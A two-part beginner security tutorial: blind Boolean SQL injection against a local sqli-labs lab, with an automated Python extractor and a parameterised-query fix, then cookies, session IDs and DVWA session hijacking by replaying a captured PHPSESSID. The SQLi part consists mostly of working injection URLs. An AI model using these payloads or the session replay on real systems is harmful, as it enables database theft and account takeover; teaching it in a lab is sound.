
Beginner Guide to SQL Injection Boolean Based (Part 2)

There are many ways to attack a database using SQL injection, as we saw in our previous tutorials on error-based attacks, login-form-based attacks and several other techniques for retrieving information from inside the database. In the same way, today we will learn a new type of SQL injection attack known as blind Boolean-based injection.

An attacker usually checks for SQL injection by placing a quote mark (') in the URL to break the statement and provoke a SQL error message. It is a fight between developer and attacker: the developer raises the security level and the attacker tries to break it. This time the developer has blocked error messages from being shown on the website. Hence even if the database is vulnerable to SQL injection, the attacker gets no error message on the website. The attacker will instead try to confirm that the application is vulnerable to blind SQL injection by evaluating the results of various queries that return either TRUE or FALSE.

Let's start!!
Using Dhakkan we will demonstrate blind SQL injection.
Lesson 8
Lesson 8 covers blind Boolean-based injection, so first open http://localhost:81/sqli/Less-8/?id=1 in the browser; this sends the following query to the database.

SELECT * from table_name WHERE id=1


As output it displays "You are in" in yellow text on the web page, as shown in the image.


When the attacker tries to break this query with a quote mark ('), http://localhost:81/sqli/Less-8/?id=1', or with any other technique, he will not find any error message. Moreover, the yellow text disappears if the attacker injects an invalid query, which is also shown in the image.


Then the attacker moves on to blind SQL injection, where the injected query must return an answer of either true or false.
http://localhost:81/sqli/Less-8/?id=1' AND 1=1 --+
SELECT * from table_name WHERE id=1' AND 1=1

Now the database tests whether 1 equals 1; since the condition is valid the query returns TRUE, and in the screenshot the yellow text "You are in" is back, which means our query was accepted.


Next, inject the following into the URL:
http://localhost:81/sqli/Less-8/?id=1' AND 1=0 --+
SELECT * from table_name WHERE id=1' AND 1=0

Now it tests whether 1 equals 0; since 1 is not equal to 0, the database answers FALSE. The screenshot confirms this: the yellow text disappears again.

This confirms that the web application is vulnerable to blind SQL injection. Using true and false conditions we are going to retrieve database information.


Length of database string
The following query asks for the length of the database name. For example, if the database name is IGNITE, which contains 6 letters, the length of the string IGNITE is 6.

Similarly we inject the query below, which asks whether the length of the database name is equal to 1; the database answers TRUE or FALSE through the presence or absence of the text "You are in".

http://localhost:81/sqli/Less-8/?id=1' AND (length(database())) = 1--+

In the screenshot the text disappears again, meaning the query returned FALSE: the length of the database name is not 1.



http://localhost:81/sqli/Less-8/?id=1' AND (length(database())) = 2--+

This time it tests whether the length of the database name is equal to 2; again it returns FALSE, so the length is not 2. Repeat the same step for lengths 3, 4, 5 and so on until we receive TRUE.



http://localhost:81/sqli/Less-8/?id=1' AND (length(database())) = 8--+

When I test for length 8 it answers TRUE, and as a result the yellow text "You are in" appears again.



Since a computer does not understand human language and works only in binary, we will use ASCII codes. The ASCII code assigns an integer value to every symbol in the character set: letters, digits, punctuation marks, special characters and control characters.

For example, look at the ASCII codes of the following string:

1 = I = 73
2 = G = 71
3 = N = 78
4 = I = 73
5 = T = 84
6 = E = 69


Next we enumerate the database name character by character, using ASCII codes for all 8 positions.
The next query asks the database to test whether the first character of the database name is greater than 100, using ascii() on a substring.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) > 100--+

It returns TRUE; if you check the ASCII table you will observe that the lowercase letters run from 100 up to 172.



http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) > 120--+

Similarly it tests whether the first letter is greater than 120. This time it returns FALSE, which means the first letter is greater than 100 and less than 120.



http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) > 101--+

Next it tests whether the first character is greater than 101; again we get FALSE.



We performed this test from 101 up to 114 and received FALSE every time.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) > 114--+


http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) = 115--+

Finally we receive TRUE at 115, which means the first character is 115, where 115 = 's'.


Similarly, test the second character by repeating the above step with the second position in place of the first.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),2,1))) > 100--+



I received TRUE at 101, which means the second character is 101, and 101 = 'e'.
Similarly I performed this for all eight characters and got the following result:

1 = s = 115
2 = e = 101
3 = c = 99
4 = u = 117
5 = r = 114
6 = i = 105
7 = t = 116
8 = y = 121



Table string length

We use the same technique to enumerate the tables inside the database. The given query tests whether the length of the first table name is greater than 5.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) > 5 --+

In reply we receive TRUE and the text "You are in" appears again on the website.



The given query tests whether the length of the first table name is greater than 6.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) > 6 --+

In reply we receive FALSE and the text "You are in" disappears again from the website.



The given query tests whether the length of the first table name is equal to 6.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+

In reply we receive TRUE and the text "You are in" appears again on the website.

Similarly I tested the second and third tables with the same technique, changing only the table offset in the same query.



Similarly, enumerate the fourth table with the following query, which tests whether the length of the fourth table name is equal to 5.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 --+

In reply we receive TRUE and the text "You are in" appears again on the website.

As we did for the database name, we use the same ASCII-code technique to retrieve the table name.



Next we enumerate the 4th table name character by character for all 5 positions.
The next query asks the database to test whether the first character of the table name is greater than 115, using ascii() on a substring.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) > 115 --+

It returns TRUE and the text "You are in" appears again on the website; now we narrow the range by matching against the ASCII table.



The next query asks the database to test whether the first character of the table name is greater than 120.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) > 120 --+

This time it returns FALSE, which means the first letter is greater than 115 and less than 120.



Proceeding to compare the character against the ASCII codes between 115 and 120: the next query asks the database to test whether the first character of the table name is equal to 116.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 116 --+

It returns FALSE; the text disappears.



http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 --+

It returns TRUE; the text appears.

Similarly we tested the remaining characters and received the following result:
1 = u = 117
2 = s = 115
3 = e = 101
4 = r = 114
5 = s = 115



User Name Enumeration

Using the same method we now enumerate the length of the username inside the users table.
The query below tests whether the string length is equal to 4.
http://localhost:81/sqli/Less-8/?id=1' AND (length((select username from users limit 0,1))) = 4 --+

It replies TRUE, indicated by the yellow text.



Using the same method we now enumerate the username itself from inside the users table.

The query below tests the first character using its ASCII code.
http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 100 --+

We received FALSE, which means the first character must be less than 100.


http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 50 --+

We received TRUE, which means the first character must be more than 50.



Similarly,

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 60 --+

We received TRUE, which means the first character must be more than 60.




Similarly,

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 70 --+

We received FALSE, which means the first character is less than 70.
Hence the first character must lie between ASCII codes 60 and 70.



Proceeding to compare the character against specific ASCII codes using the following query.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) = 68 --+
This time we successfully receive TRUE, with the text "You are in" appearing.
Similarly I tested all four characters in order to retrieve the username:
1 = D = 68
2 = u = 117
3 = m = 109
4 = b = 98

So today we learned how an attacker extracts data from a database using blind SQL injection.

!!Try yourself to retrieve the password for user Dumb!!
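As an added example (not part of the original post or of sqli-labs), the following Python simulates the Lesson 8 page against an in-memory SQLite table, once with the string-concatenated query and once with a parameterised query. It reproduces the post's TRUE/FALSE oracle checks and the username recovery, but bisects the ASCII range instead of stepping through codes one by one, and shows that the parameterised version gives the oracle nothing to work with. The users table, its single row and the ascii() helper are constructed assumptions.

```python
import sqlite3

# Constructed stand-in for the Less-8 page: an in-memory SQLite table (not the
# sqli-labs code). SQLite has no ascii() function, so one is registered here.
conn = sqlite3.connect(":memory:")
conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'Dumb', 'EXAMPLE_PW')")  # sample row


def page_vulnerable(id_param):
    """Mimics Lesson 8: id is pasted into the SQL; the page shows 'You are in'
    (True) when a row comes back and nothing (False) otherwise; errors are hidden."""
    sql = "SELECT * FROM users WHERE id='%s' LIMIT 0,1" % id_param
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def page_fixed(id_param):
    """Same page with a parameterised query: id is bound as data, never as SQL."""
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (id_param,)).fetchone() is not None


def oracle_present(page):
    """The post's first test: a TRUE and a FALSE condition must render differently."""
    return page("1' AND 1=1 -- ") and not page("1' AND 1=0 -- ")


def first_username(page, max_len=32):
    """Reproduce the username section: length first, then one character per
    position. Bisection needs about 7 conditions per character instead of the
    post's one-code-at-a-time stepping. Returns None when no oracle exists."""
    if not oracle_present(page):
        return None
    sub = "(select username from users limit 0,1)"
    length = next((n for n in range(1, max_len + 1)
                   if page("1' AND length(%s) = %d -- " % (sub, n))), None)
    if length is None:
        return None
    name = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126                      # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if page("1' AND ascii(substr(%s,%d,1)) > %d -- " % (sub, pos, mid)):
                lo = mid + 1                  # character code is above mid
            else:
                hi = mid                      # character code is mid or below
        name += chr(lo)
    return name
```

Against page_fixed every injected condition fails the same way, so the page cannot be told to answer TRUE or FALSE and nothing can be inferred; that is the defence this post's technique depends on being absent.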






Beginner Guide to Understand Cookies and Session Management

A cookie is a small piece of data sent by a server to a browser and stored on the user's computer while the user is browsing. Cookies are produced and exchanged between the browser and the server using HTTP headers.
Cookies allow the server to store and retrieve data on the client. A cookie is stored in a file on the client side, and the maximum size of a cookie is limited to 4K in any web browser. Cookies have a limited lifetime because they carry an expiry date and time, and session cookies expire as soon as the browser is closed.
Example: when you visit YouTube and search for Bollywood songs, this gets noted in your browsing history; the next time you open YouTube in your browser, the cookie reads your browsing history and you are shown Bollywood songs on your YouTube homepage.

Creating a cookie
The setcookie() function is used to send the cookie along with the rest of the HTTP headers.


When a developer creates a cookie with the setcookie function, he must specify at least three arguments: setcookie(name, value, expiration);

Cookie Attributes

1. Name: Specifies the name of the cookie.
2. Value: Specifies the value of the cookie.
3. Secure: Specifies whether the cookie should only be transmitted over a secure HTTPS connection. TRUE indicates that the cookie will only be set if a secure connection exists. Default is FALSE.
4. Domain: Specifies the domain name of the cookie. To make the cookie available on all subdomains of example.com, set domain to "example.com". Setting it to www.example.com makes the cookie available only in the www subdomain.
5. Path: Specifies the server path of the cookie. If set to "/", the cookie is available within the entire domain. If set to "/php/", the cookie is only available within the php directory and all its sub-directories. The default value is the directory in which the cookie is being set.
6. HttpOnly: If set to TRUE the cookie is accessible only through the HTTP protocol (it cannot be read by client-side scripting languages). This setting helps reduce identity theft through XSS attacks. Default is FALSE.
7. Expires: Specifies when the cookie expires. The value time()+86400*30 sets the cookie to expire in 30 days. If this parameter is omitted or set to 0, the cookie expires at the end of the session (when the browser closes). Default is 0.


Necessity of Cookies
Cookies can be used for various purposes:
§  Identifying unique visitors.
§  HTTP is a stateless protocol; cookies let us track the state of the application using small files stored on the user's computer.
§  Recording the time each user spends on a website.

Type of cookies
Session Cookie
These cookies die when the browser is closed because they are stored in the browser's memory. They are used on e-commerce websites so the user can continue browsing without losing what he put in his cart. If the user visits the website again after closing the browser, these cookies are no longer available. They are safer, because nothing other than the browser can access them.

Persistent Cookie
These cookies do not depend on the browser session because they are stored in a file on the user's computer. If the user closes the browser and then accesses the website again, these cookies are still available. The lifetime of these cookies is specified in the cookie itself (as an expiration time). They are less secure.

Third Party Cookie
A cookie set by a domain name other than the one that appears in the browser's address bar. These cookies are mainly used for tracking user browsing patterns and/or finding advertisement recommendations for the user.

Secure Cookie
A secure cookie can only be transmitted over an encrypted connection. A cookie is made secure by adding the Secure flag to it. Browsers which support the Secure flag will only send such cookies when the request is going to an HTTPS page.

HTTP Only Cookie
It tells the browser that this particular cookie should only be accessed by the server. Any attempt to access the cookie from client-side script is blocked. This is an important security protection for session cookies.
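As an added example (not from the original post), the following Python parses Set-Cookie headers and audits them against the attribute list above and the Secure and HttpOnly sections: a session cookie without HttpOnly is readable by script, one without Secure can travel over plain HTTP, one with Expires outlives the browser, and a Domain attribute shares it with every subdomain. The sample headers and the set of cookie names treated as session identifiers are constructed assumptions.

```python
# Constructed Set-Cookie headers to audit (not captured from DVWA or any site).
SAMPLE_HEADERS = [
    "PHPSESSID=EXAMPLE_SID_1; Path=/",
    "dvwaSession=1; Path=/; HttpOnly",
    "prefs=dark; Expires=Wed, 21 Oct 2026 07:28:00 GMT; Path=/; Domain=example.com",
    "PHPSESSID=EXAMPLE_SID_2; Path=/; Secure; HttpOnly",
]

# Cookie names this post treats as session identifiers (assumption for the audit).
SESSION_COOKIE_NAMES = {"phpsessid", "dvwasession"}
MAX_COOKIE_BYTES = 4096  # the 4K browser limit mentioned above


def parse_set_cookie(header):
    """Split one Set-Cookie header into its name, value and attributes."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = {"name": name.strip(), "value": value.strip(), "secure": False,
              "httponly": False, "path": None, "domain": None, "expires": None}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key = key.strip().lower()
        if key in ("secure", "httponly"):
            cookie[key] = True            # flag attributes carry no value
        elif key in ("path", "domain", "expires"):
            cookie[key] = val.strip()
    return cookie


def audit_cookie(cookie):
    """Return a list of findings for one parsed cookie."""
    findings = []
    is_session = cookie["name"].lower() in SESSION_COOKIE_NAMES
    if is_session and not cookie["httponly"]:
        findings.append("missing HttpOnly: session cookie readable by script (XSS theft)")
    if is_session and not cookie["secure"]:
        findings.append("missing Secure: session cookie may travel over plain HTTP")
    if is_session and cookie["expires"] is not None:
        findings.append("has Expires: session cookie persists after the browser closes")
    if cookie["domain"]:
        findings.append("Domain=%s: shared with every subdomain" % cookie["domain"])
    if len(cookie["name"]) + len(cookie["value"]) > MAX_COOKIE_BYTES:
        findings.append("over 4K: browsers will drop or truncate this cookie")
    return findings


def audit_headers(headers):
    """Audit a list of Set-Cookie headers; returns [(name, findings), ...]."""
    return [(c["name"], audit_cookie(c)) for c in map(parse_set_cookie, headers)]
```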

Zombie Cookie
A zombie cookie is an HTTP cookie that is recreated after deletion. Cookies are recreated from backups stored outside the web browser's dedicated cookie storage.

Sessions
PHP session: when a user makes changes in a web application, such as signing in or out, the server does not by itself know who that person is. To solve this problem PHP sessions were introduced, which store user information to be used across several web pages.
Session variables hold information about one single user and are available to all pages in one application.
Example: login ID, user name and password.

Session ID
PHP generates a unique identifier for that specific session in the form of a hash, a random string of 32 hexadecimal characters such as 5f7dok65iif989fwrmn88er47gk834, known as the PHP session ID.

A session ID or token is a unique value used to identify a user who has logged into a website. The session ID is stored on the server and is assigned to a specific user for the duration of that user's visit (session). The session ID can be stored as a cookie, form field or URL.

Explanation:
Now let's have a look at this picture and see what it shows:
In the picture we can clearly see three components: the HTTP client, the HTTP server and the database (holding the session ID).

Step 1: the client sends a request to the server via POST or GET.
Step 2: a session ID is created on the web server. The server saves the session ID into the database and, using Set-Cookie, sends the session ID to the client browser in the response.
Step 3: the cookie with the session ID stored in the client browser is sent back to the server, where the server matches it against the database and responds with HTTP 200 OK.


Session hijacking

As we know, different users have unique session IDs. When an attacker sniffs the session via a man-in-the-middle attack, or steals the session ID or session token via XSS, this is called session hijacking. When the attacker sends the stolen session ID to the web server, the server matches that ID against the session IDs stored in its database. If they match, the server replies with HTTP 200 OK and the attacker gains access without submitting proper credentials.

Session hijacking tutorial
For this tutorial I have targeted DVWA; here the cookie name is dvwaSession.
Note: the session ID for this page changes every time we close the browser.

Now capture the browser request using Burp Suite.


In the image we can see the cookie holds PHPSESSID P38kq30vi6arr0b321p2uv86k0; now send this intercepted data to Repeater to observe its response.


In the response you can see the highlighted data shows Set-Cookie: dvwaSession=1, along with an HTTP 200 OK response from the server side.

According to the developer, a new session ID is generated by the server each time, but the attacker sniffs this session ID P38kq30vi6arr0b321p2uv86k0 for unauthorized login.


The next time we intercept data through Burp Suite we receive another session ID, i.e. PHPSESSID=gutnu601knp4qsrgfdb4ad0te3; again send this intercepted data to Repeater to observe its response.


But before we look at its response, replace the new PHPSESSID with the old PHPSESSID.

In the image you can observe that we have replaced the session ID and then generated its response, in which Set-Cookie: dvwaSession=6 and an HTTP 200 OK response come back from the server side.


Now change the value inside the intercepted data and then forward this request to the server.


Session vs Cookies

Session                                                          | Cookies
Data are stored on the server                                    | Data are stored in the client's browser
Session data are more secure because they never travel with every HTTP request | Travel with each and every HTTP request
You can store objects (large amounts of data)                    | You can store only strings (max file size 4 KB)
Sessions cannot be used for future reference                     | Cookies are mostly used for future reference